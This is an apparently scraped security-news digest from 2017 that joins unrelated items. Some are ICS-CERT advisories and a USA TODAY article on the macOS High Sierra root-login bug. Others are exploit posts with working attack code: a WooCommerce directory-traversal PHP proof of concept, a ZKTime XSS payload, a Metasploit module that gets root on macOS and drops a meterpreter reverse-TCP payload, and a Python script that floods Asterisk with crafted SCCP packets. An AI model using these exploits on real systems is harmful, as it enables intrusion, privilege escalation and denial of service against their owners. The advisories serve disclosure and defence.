WordPress WooCommerce 2.0 / 3.0 Directory Traversal

# Exploit Title: WordPress woocommerce directory traversal
# Date: 28-11-2017
# Software Link: https://wordpress.org/plugins/woocommerce/
# Exploit Author:fu2x2000
# Contact: [email protected]
# Website:
# CVE:2017-17058
#Version:Tested on WordPress 4.8.3 woocommerce 2.0/3.0
# Category: webapps

1. Description

Identifying woo commerce theme pluging properly sanitized against Directory
Traversal,even the latest version of WordPress with woocommerce can be
vulnerable.

2. Proof of Concept

$woo = “www/wp-content/plugins/woocommerce/templates/emails/plain/”; `
function file_get_contents_utf8($fn) {
$opts = array(
‘http’ => array(
‘method’=>”GET”,
‘header’=>”Content-Type: text/html; charset=utf-8″
)
);

$wp = stream_context_create($opts);
$result = @file_get_contents($fn,false,$wp);
return $result;
}
/* $head= header(“Content-Type: text/html; charset=utf-8”); ; */
header(“Content-Type: text/html; charset=utf-8”);

$result = file_get_contents_utf8(“http://”.$woo);

echo $result;

Regards

Fu2x200

Siemens SWT3000

CVSS v3 5.3

ATTENTION: Remotely exploitable/low skill level to exploit.

Vendor: Siemens

Equipment: SWT3000

Vulnerabilities: Improper Authentication, Authentication Bypass, Improper Input Validation.

AFFECTED PRODUCTS

Siemens reports that the vulnerabilities affect the following SWT 3000 Teleprotection system products:

  • EN100 for SWT3000 (iSWT3000):
    • IEC 61850 firmware: All versions prior to V4.29.01
    • TPOP firmware: All versions prior to V01.01.00

IMPACT

Successful exploitation of these vulnerabilities under certain conditions may allow attackers to perform a denial-of-service attack.

MITIGATION

Siemens has provided updated firmware that fixes the vulnerabilities for the following affected products and recommends users update to the newest version:

  • SWT3000:
    • IEC61850 firmware: Update to V4.29.01
    • TPOP firmware: Update to V01.01.00

To obtain the firmware please contact the Customer Support Center:

[email protected]

Siemens recommends users protect network access with appropriate mechanisms. Siemens also advises that users configure the operational environment according to Siemens’ Operational Guidelines for Industrial Security:

https://www.siemens.com/cert/operational-guidelines-industrial-security

Please note that not all of the devices above are affected by all vulnerabilities. For more information on these vulnerabilities and more detailed mitigation instructions, please see Siemens Security Advisory SSA-350846 at the following location:

http://www.siemens.com/cert/advisories

NCCIC/ICS-CERT recommends that users take defensive measures to minimize the risk of exploitation of these vulnerabilities. Specifically, users should:

  • Minimize network exposure for all control system devices and/or systems, and ensure that they are not accessible from the Internet.
  • Locate control system networks and remote devices behind firewalls, and isolate them from the business network.
  • When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that VPN is only as secure as the connected devices.

ICS-CERT reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures.

ICS-CERT also provides a section for control systems security recommended practices on the ICS-CERT web page. Several recommended practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies.

Additional mitigation guidance and recommended practices are publicly available in the ICS‑CERT Technical Information Paper, ICS-TIP-12-146-01B–Targeted Cyber Intrusion Detection and Mitigation Strategies, that is available for download from the ICS-CERT web site.

Organizations observing any suspected malicious activity should follow their established internal procedures and report their findings to ICS-CERT for tracking and correlation against other incidents.

In addition, ICS-CERT recommends that users take the following measures to protect themselves from social engineering attacks:

  1. Do not click web links or open unsolicited attachments in email messages.
  2. Refer to Recognizing and Avoiding Email Scams for more information on avoiding email scams.
  3. Refer to Avoiding Social Engineering and Phishing Attacks for more information on social engineering attacks.

No known public exploits specifically target these vulnerabilities.

VULNERABILITY OVERVIEW

The integrated web server (Port 80/TCP) of the affected devices could allow remote attackers to obtain sensitive device information if network access was obtained. SWT3000 with TPOP is not affected by this vulnerability.

CVE-2016-4784 has been assigned to this vulnerability. A CVSS v3 base score of 5.3 has been calculated; the CVSS vector string is (AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N).

The integrated web server (Port 80/TCP) of the affected devices could allow remote attackers to obtain a limited amount of device memory content if network access was obtained. SWT3000 with TPOP is not affected by this vulnerability.

CVE-2016-4785 has been assigned to this vulnerability. A CVSS v3 base score of 5.3 has been calculated; the CVSS vector string is (AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N).

Attackers with network access to the device’s web interface (Port 80/TCP) could possibly circumvent authentication and perform certain administrative operations.

CVE-2016-7112 has been assigned to this vulnerability. A CVSS v3 base score of 5.3 has been calculated; the CVSS vector string is (AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N).

Specially crafted packets sent to Port 80/TCP could cause the affected EN100 module of the SWT3000 to go into defect mode.

CVE-2016-7113 has been assigned to this vulnerability. A CVSS v3 base score of 5.3 has been calculated; the CVSS vector string is (AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L).

Attackers with network access to the device’s web interface (Port 80/TCP) could possibly circumvent authentication and perform certain administrative operations. A legitimate user must be logged into the web interface for the attack to be successful.

CVE-2016-7114 has been assigned to this vulnerability. A CVSS v3 base score of 4.3 has been calculated; the CVSS vector string is (AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N).

RESEARCHER

Siemens reported these vulnerabilities to ICS-CERT.

BACKGROUND

Critical Infrastructure Sectors: Energy

Countries/Areas Deployed: Worldwide

Company Headquarters Location: Germany

Geovap Reliance SCADA

CVSS v3 6.1

ATTENTION: Remotely exploitable/low skill level to exploit.

Vendor: Geovap

Equipment: Reliance SCADA

Vulnerability: Cross-site Scripting

AFFECTED PRODUCTS

The following versions of Reliance SCADA, a software management platform, are affected:

  • Reliance SCADA Version 4.7.3 Update 2 and prior.

IMPACT

Successful exploitation of this vulnerability could allow an unauthenticated attacker to inject arbitrary JavaScript in a specially crafted URL request that may allow for read/write access.

MITIGATION

Geovap has released Version 4.7.3 Update 3 of the software which can be found at:

https://www.reliance-scada.com/en/download

NCCIC/ICS-CERT recommends that users take defensive measures to minimize the risk of exploitation of this vulnerability. Specifically, users should:

  • Minimize network exposure for all control system devices and/or systems, and ensure that they are not accessible from the Internet.
  • Locate control system networks and remote devices behind firewalls, and isolate them from the business network.
  • When remote access is required, use secure methods such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that VPN is only as secure as the connected devices.

ICS-CERT reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures.

ICS-CERT also provides a section for control systems security recommended practices on the ICS-CERT web page. Several recommended practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies.

Additional mitigation guidance and recommended practices are publicly available in the ICS‑CERT Technical Information Paper, ICS-TIP-12-146-01B–Targeted Cyber Intrusion Detection and Mitigation Strategies, that is available for download from the ICS-CERT web site.

Organizations observing any suspected malicious activity should follow their established internal procedures and report their findings to ICS-CERT for tracking and correlation against other incidents.

No known public exploits specifically target this vulnerability.

VULNERABILITY OVERVIEW

This vulnerability could allow an unauthenticated attacker to inject arbitrary code.

CVE-2017-16721 has been assigned to this vulnerability. A CVSS v3 base score of 6.1 has been assigned; the CVSS vector string is (AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N).

RESEARCHER

Can Demirel reported the vulnerability to ICS-CERT.

BACKGROUND

Critical Infrastructure Sectors: Critical Manufacturing, Energy, Transportation Systems, and Water and Wastewater Systems

Countries/Areas Deployed: Worldwide

Company Headquarters Location: Czech Republic

ZKTeco ZKTime Web 2.0.1.12280 Cross Site Scripting

*1. Introduction*

Vendor: ZKTeco
Affected Product: ZKTime Web – 2.0.1.12280
Fixed in:
Vendor Website: https://www.zkteco.com/product/ZKTime_Web_2.0_435.html
Vulnerability Type: Reflected XSS
Remote Exploitable: Yes
CVE: CVE-2017-17057
*2. Overview*

There is a reflected XSS vulnerability in ZKTime Web. The
vulnerability exists due to insufficient filtration of user-supplied data.
A remote attacker can execute arbitrary HTML and script code in browser in
context of the vulnerable application.

*3. Affected Modules*

Go to
Personnel -> Personnel -> Advanced Query ->

Select Search Field as ‘Department’ and in ‘Range’ field mention
‘<script>alert(‘XSS’)</script>

*4. Payload*
<script>alert(‘XSS’)</script>

*5. Credit*
Himanshu Mehta (@LionHeartRoxx)

NCSC Releases Security Advisory

Original release date: November 29, 2017

The United Kingdom’s National Cyber Security Centre (NCSC) has released an advisory to highlight Neuron and Nautilus tools used alongside Snake—malware that provides a platform to steal sensitive data. NCSC provides enhanced cybersecurity services to protect against cybersecurity threats.

US-CERT encourages users and administrators to review the NCSC advisory for more information.


This product is provided subject to this Notification and this Privacy & Use policy.

Mac OS X Root Privilege Escalation

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Local
Rank = ExcellentRanking

include Msf::Post::File
include Msf::Exploit::EXE
include Msf::Exploit::FileDropper

def initialize(info={})
super(update_info(info,
‘Name’ => ‘Mac OS X Root Privilege Escalation’,
‘Description’ => %q{
This module exploits a serious flaw in MacOSX High Sierra.
Any user can login with user “root”, leaving an empty password.
},
‘License’ => MSF_LICENSE,
‘References’ =>
[
[ ‘URL’, ‘https://twitter.com/lemiorhan/status/935578694541770752’ ],
[ ‘URL’, ‘https://news.ycombinator.com/item?id=15800676’ ],
[ ‘URL’, ‘https://forums.developer.apple.com/thread/79235’ ],
],
‘Platform’ => ‘osx’,
‘Arch’ => ARCH_X64,
‘DefaultOptions’ =>
{
‘PAYLOAD’ => ‘osx/x64/meterpreter_reverse_tcp’,
},
‘SessionTypes’ => [ ‘shell’, ‘meterpreter’ ],
‘Targets’ => [
[ ‘Mac OS X 10.13.1 High Sierra x64 (Native Payload)’, { } ]
],
‘DefaultTarget’ => 0,
‘DisclosureDate’ => ‘Nov 29 2017’
))
end

def exploit_cmd(root_payload)
“osascript -e ‘do shell script \”#{root_payload}\” user name \”root\” password \”\” with administrator privileges'”
end

def exploit
payload_file = “/tmp/#{Rex::Text::rand_text_alpha_lower(12)}”
print_status(“Writing payload file as ‘#{payload_file}'”)
write_file(payload_file, payload.raw)
register_file_for_cleanup(payload_file)
output = cmd_exec(“chmod +x #{payload_file}”)
print_status(“Executing payload file as ‘#{payload_file}'”)
cmd_exec(exploit_cmd(payload_file))
end
end

Asterisk 13.17.2~dfsg-2 Memory Exhaustion

# Exploit Author: Juan Sacco <[email protected]> at KPN Red Team –
http://www.kpn.com
# Date and time of release: Nov, 15 2017
# Found this and more exploits on my open source security project:
http://www.exploitpack.com
#
# Tested on: Asterisk 13.17.2~dfsg-2
#
# Description: Asterisk is prone to a remote unauthenticated memory exhaustion
# The vulnerability is due to an error when the vulnerable application
handles crafted SCCP packet. A remote attacker may be able to exploit
this to cause a denial of service condition on the affected system.
#
# [Nov 29 15:38:06] ERROR[7763] tcptls.c: TCP/TLS unable to launch
helper thread: Cannot allocate memory
#
# Program: Asterisk is an Open Source PBX and telephony toolkit. It is, in a
# sense, middleware between Internet and telephony channels on the bottom,
# and Internet and telephony applications at the top.
#
# Homepage: http://www.asterisk.org/
# Filename: pool/main/a/asterisk/asterisk_13.17.2~dfsg-2_i386.deb
#
# Example usage: python asteriskSCCP.py 192.168.1.1 2000

import binascii
import sys
import socket
import time

def asteriskSCCP(target,port):
try:
while 1:
# Open socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# Set reuse ON
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
# Bind port
s.connect((target, port))
print(“[” + time.strftime(‘%a %H:%M:%S’) + “]” + ” – ” +
“Connected to:”), target, port
print(“[” + time.strftime(‘%a %H:%M:%S’) + “]” + ” – ” +
“Establishing connection.. “)
packet =
binascii.unhexlify(b’450002c50001000040067a307f0000017f000001001407d00000000000000000500220009a2b0000e4eea8a72a97467d3631824ac1c08c604e762eb80af46cc6d219a4cf65c13992b4a8af94cb5e87c14faf0254cba25af9fb33bd8d2a58e370e3a866639dfdec350875cfecfe068a16746963fffeee0fdcbac75eb4f09d625f3ae1b4a3eb2812e6f838e88b0d7d9881465a0faf45664df8008d4d6de1a5e20a9c97a71f57d3429e0b17db3aeb3bf516ca4e207a5c801d04132979508f267c7425a57fd0edd271b57ff9831b595b519e73404f170492ae3ad438d4aeca854e96c9dd56d2af3813b8de6b3d8d31d32c0e95be9cb3a5c6106f64c4f19cda2b55ad1471f3d63e1b1ca3c29f362def063ad9b29ea4d1c1fda5c2e4cf0ae75064c27411a2deb5fab11e6412cd5a4037f38779f0173fa1f2ca1740aa78fe37bc0a50f5619c7abba00f2957bf06770ff4d6c003d4533de19f51bcbbd9bbe0ceb3e17dd180e58ee2698998edca42e3d6a8079cc151b608e5bd5aff052e718e714b360f9b091894a5eeed34dafe41d27f19988b3e0ac5a6dd8947c3537ae31154e983cdbac0861afc500206e74030c9e452738ece13075df2dbebb8a1737ee3b4880bc6d428ee2d3d64f585e197dc63f30638a4c55cff0b8e6aa82dfdf199baabd92c10092414015fad5f08e9c816a4d028574ee5340c08b2fe65ca1e7ca907ea2ebd6661e01e9b9d39d5bdb3e3cebd58e96f97f487bb580bcf5447ac48a2ad5541ae0ddcc9ec1f9528f2c07316dbd760e91e3bddbd53fbf6987fdba0830bdb485524950b5611e18e5d517c0f3ae05aa2daec42a5c43eab07aa0018ab750dc6995adad6561cc8a0379f7a12d8e5e474df013459442801d6871c5820318d790833687619b70b0da74893ca441f177ab9e7d7a537c6ff4920c79631905c35167d8a6efc0c6bced9270691abc5b4de84f956f8c1d34f9ef3f0073dafce8c076c4d537e981a1e8ff6ed3e8c’)

# Log the packet in hexa and timestamp
fileLog = target + “.log”
logPacket = open(fileLog, “w+”)
logPacket.write(“[“+time.strftime(‘%a %H:%M:%S’)+”]”+ ” –
Packet sent: ” + binascii.hexlify(bytes(packet))+”\n”)
logPacket.close()

# Write bytecodes to socket
print(“[“+time.strftime(‘%a %H:%M:%S’)+”]”+” – “+”Packet sent: “)
s.send(bytes(packet))
# Packet sent:
print(bytes(packet))
try:
data = s.recv(4096)
print(“[” + time.strftime(‘%a %H:%M:%S’) + “]” + ” –
“+ “Data received: ‘{msg}'”.format(msg=data))
except socket.error, e:
print ‘Sorry, No data available’
continue
s.close()
except socket.error as error:
print error
print “Sorry, something went wrong!”

def howtouse():
print “Usage: AsteriskSCCP.py Hostname Port”
print “[*] Mandatory arguments:”
print “[-] Specify a hostname / port”
sys.exit(-1)

if __name__ == “__main__”:
try:
# Set target
target = sys.argv[1]
port = int(sys.argv[2])

print “[*] Asterisk 13.17 Exploit by Juan Sacco “
print “[*] Red Team KPN <[email protected]> “
asteriskSCCP(target, port)
except IndexError:
howtouse()

Apple’s MacOS High Sierra security bug: Do this now

Apple’s MacOS High Sierra security bug: Do this now

Apple’s MacOS High Sierra security bug: Do this now

SAN FRANCISCO — Apple pushed out a fix for a serious security bug in computers running its most recent operating system on Wednesday morning, less than a day after it was first widely reported.  

The bug in the Apple operating system allowed anyone with physical access to a Mac running the latest version of Apple’s operating system to easily infiltrate the computer and gain full access to everything on it.

MacBook Pro 13-inch (Touch Bar) Laptop Review

Reviewed.com

It only affected Macs that run the latest version of Apple’s operating system software, MacOS High Sierra.

Apple users need to install the latest update to their operating system to correct the problem. To do so:

– Open the App Store app on the Mac.

– Click Updates in the App Store toolbar

– Use the Update buttons to download and install any updates listed.

– Updates installed in the last 30 days appear below this list.

The bug requires the would-be hacker to actually type on the Mac in question’s keyboard, so the easiest fix is to keep vulnerable machines under lock and key. There were also reports that in some cases if a user has allowed screen sharing on their computer it’s possible to exploit the bug remotely. 

The bug only affects Macs that run the latest version of Apple’s operating system software, MacOS High Sierra. 

The bug, made public on Twitter Tuesday by Turkish software developer Lemi Orhan Ergin, revealed that anyone can log into a Mac running that operating system, or adjust settings on the computer, by entering the login name “root” (without quotations) and clicking enter, no password needed. 

The person would need physical access to the computer as the login can’t be done remotely.

To check for the vulnerability

It appears that the bug only affects Apple machines running the High Sierra 10.13 or 10.13.1 operating systems. To see which operating system a computer is running, click the apple icon in the upper left hand corner of the screen and then click “About this Mac.” That will give the version number of the operating system. 

To see if a Mac is vulnerable to the bug, follow these steps:

– Open System Preferences

– Choose Users & Groups 

– Click the lock to make changes 

– Type “root” in the username field 

– Put the cursor in the Password field and click there, but don’t type anything 

– Click unlock. If the system allows you in, you would be able to add a new administrator-level account with full privileges on the system — all without a password to the computer. 

Apple working on a fix

USA TODAY confirmed the vulnerability on a late 2013 MacBook Pro running MacOS 10.13.1 and a late 2015 iMac running the same software. The bug unlocked the safeguards that prevent changes in “System Preferences” on the machine as well as letting someone log into the Mac from the lock screen by simply going to the “other user” tab. 

In following Apple’s steps USA TODAY was able to disable the “root user” access.

Apple did not immediately respond to a question as to when users might expect to see a software update. 

It should go without saying that the bug poses plenty of risks. By giving anyone administrator access, they would have unfiltered access to your files as well as the ability to delete your data, change your password or even lock you out. The security vulnerability also would allow someone to make these changes remotely so long as they were connected to your computer. 

Contributing: Ed Baig

Follow Eli Blumenthal on Twitter @eliblumenthal and Elizabeth Weise @eweise

https://amp-usatoday-com.cdn.ampproject.org/c/s/amp.usatoday.com/amp/903923001